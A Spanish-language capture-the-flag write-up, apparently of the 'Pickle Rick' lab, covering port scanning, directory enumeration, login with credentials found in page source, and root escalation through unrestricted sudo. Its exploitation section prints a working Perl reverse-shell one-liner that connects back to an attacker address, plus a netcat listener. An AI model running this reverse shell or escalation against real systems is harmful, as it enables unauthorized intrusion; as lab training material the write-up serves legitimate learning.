# Pickle Rick

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.146.162
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGVXYTOMdFI8eznWCj0IG%2Fimage.png?alt=media&#x26;token=7fce82e1-3a0a-4f3e-b406-42492a3f286d" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap 10.10.146.1626
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FU8tQCgePrfLfWlH3OQOm%2Fimage.png?alt=media&#x26;token=62bdf6f5-a9f9-4b99-8225-d2c615ebae26" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo el puerto **22** perteneciente al servicio **SSH** y el puerto **80** perteneciente al servicio **HTTP** están abiertos, por lo que se procederá a indagar más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 10.10.146.162
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1GzMoiNqzJeEMoEi8B7Y%2Fimage.png?alt=media&#x26;token=cbb5457a-724d-44bc-82a9-5cc43b8212cc" alt=""><figcaption></figcaption></figure>

Revisamos el puerto 80.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FkWkc6ODez7o170E3Cown%2FCaptura%20de%20pantalla%202025-06-19%20220800.png?alt=media&#x26;token=49cee9bd-61e4-4831-9758-f7def8618acf" alt=""><figcaption></figcaption></figure>

Revisando el código fuente hay algo relevante como un usuario.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FO8ecxQzGXXm7bvGuaNb6%2FCaptura%20de%20pantalla%202025-06-19%20220926.png?alt=media&#x26;token=3ef9fa17-65e2-4356-98d9-45cbdb75c058" alt=""><figcaption></figcaption></figure>

Ahora buscaremos directorios con la herramienta **Gobuster** a través de:&#x20;

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://10.10.146.162
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FpqTZjNWNAtonfgoPv2aU%2Fimage.png?alt=media&#x26;token=2f3e9b76-9f96-4aab-82dc-5fa16277daf7" alt=""><figcaption></figcaption></figure>

Encontramos una página de login y un robots.txt interesantes.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F9xF1POY1Mka4I8jpZgg3%2Fimage.png?alt=media&#x26;token=7e291d36-a0e9-475b-a7df-08afc7486613" alt=""><figcaption></figcaption></figure>

Nos logueamos con el usuario y contraseña descubierta anteriormente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoZtBZsmqs2Bg4ouqLKjq%2FCaptura%20de%20pantalla%202025-06-19%20222026.png?alt=media&#x26;token=e4b020ef-56cc-46ff-9db2-68685c4e4960" alt=""><figcaption></figcaption></figure>

Es un panel de comandos por lo que listamos y vemos el contenido.

<div><figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F9R6zsXy8DnEdp1w80dsR%2Fimage.png?alt=media&#x26;token=5e8d8c1c-f6a0-46f0-8a98-b8b945194795" alt=""><figcaption></figcaption></figure> <figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FlRtD8fnw4K8y27a1kD6y%2FCaptura%20de%20pantalla%202025-06-19%20222225.png?alt=media&#x26;token=968d12ab-a632-4f4e-9b96-53de5aa6f107" alt=""><figcaption></figcaption></figure> <figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fd431NA7rGemgBWjkvE0H%2FCaptura%20de%20pantalla%202025-06-19%20222253.png?alt=media&#x26;token=29fd5f96-47f3-40ac-8ca8-6d97a2b13252" alt=""><figcaption></figcaption></figure></div>

### 🚀 **EXPLOTACIÓN**

Como podemos ejecutar comandos para obtener una Reverse Shell.

<pre><code><strong>nc -nlvp 4444
</strong><strong>perl -e 'use Socket;$i="10.8.146.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&#x26;S");open(STDOUT,">&#x26;S");open(STDERR,">&#x26;S");exec("sh -i");};'
</strong></code></pre>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FCZKR8rHKk7k7uVUHddj9%2FCaptura%20de%20pantalla%202025-06-19%20222859.png?alt=media&#x26;token=25d940b3-2a98-4581-86fb-d987718b2e58" alt=""><figcaption></figcaption></figure>

Comprobamos que tienen todos los permisos por lo que podemos ejecutar como root cualquier comando.

```
sudo ls /root/
sudo cat /root/3rd.txt
```
